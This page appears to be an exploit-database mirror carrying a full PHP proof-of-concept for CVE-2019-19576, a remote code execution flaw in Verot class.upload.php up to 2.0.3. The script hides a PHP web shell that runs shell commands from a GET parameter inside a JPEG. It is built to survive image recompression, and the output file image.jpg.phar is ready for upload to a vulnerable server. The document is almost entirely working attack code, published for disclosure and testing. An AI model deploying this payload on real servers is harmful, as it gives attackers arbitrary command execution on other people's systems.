扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 |
# Exploit Title: Verot 2.0.3 - Remote Code Execution # Date: 2019-12-05 # Exploit Author: Jinny Ramsmark # Vendor Homepage: https://www.verot.net/php_class_upload.htm # Software Link: https://github.com/verot/class.upload.php # Version: <=2.0.3 # Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41 # CVE : CVE-2019-19576 <?php #Title: jpeg payload generator for file upload RCE #Author: Jinny Ramsmark #Github: https://github.com/jra89/CVE-2019-19576 #Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576 #Usage: php inject.php #Output: image.jpg.phar is the file to be used for upload and exploitation #This script assumes no special transforming is done on the image for this specific CVE. #It can be modified however for different sizes and so on (x,y vars). ini_set('display_errors', 1); error_reporting(E_PARSE); #requires php, php-gd $orig = 'image.jpg'; $code = '<?=exec($_GET["c"])?>'; $quality = "85"; $base_url = "http://lorempixel.com"; echo "-=Imagejpeg injector 1.7=-\n"; do { $x = 100; $y = 100; $url = $base_url . "/$x/$y/"; echo "[+] Fetching image ($x X $y) from $url\n"; file_put_contents($orig, file_get_contents($url)); } while(!tryInject($orig, $code, $quality)); echo "[+] It seems like it worked!\n"; echo "[+] Result file: image.jpg.phar\n"; function tryInject($orig, $code, $quality) { $result_file = 'image.jpg.phar'; $tmp_filename = $orig . '_mod2.jpg'; //Create base image and load its data $src = imagecreatefromjpeg($orig); imagejpeg($src, $tmp_filename, $quality); $data = file_get_contents($tmp_filename); $tmpData = array(); echo "[+] Jumping to end byte\n"; $start_byte = findStart($data); echo "[+] Searching for valid injection point\n"; for($i = strlen($data)-1; $i > $start_byte; --$i) { $tmpData = $data; for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n) { $tmpData[$n] = $code[$z]; } $src = imagecreatefromstring($tmpData); imagejpeg($src, $result_file, $quality); if(checkCodeInFile($result_file, $code)) { unlink($tmp_filename); unlink($result_file); sleep(1); file_put_contents($result_file, $tmpData); echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n"; sleep(1); $src = imagecreatefromjpeg($result_file); return true; } else { unlink($result_file); } } unlink($orig); unlink($tmp_filename); return false; } function findStart($str) { for($i = 0; $i < strlen($str); ++$i) { if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA) { return $i+2; } } return -1; } function checkCodeInFile($file, $code) { if(file_exists($file)) { $contents = loadFile($file); } else { $contents = "0"; } return strstr($contents, $code); } function loadFile($file) { $handle = fopen($file, "r"); $buffer = fread($handle, filesize($file)); fclose($handle); return $buffer; } |
体验盒子
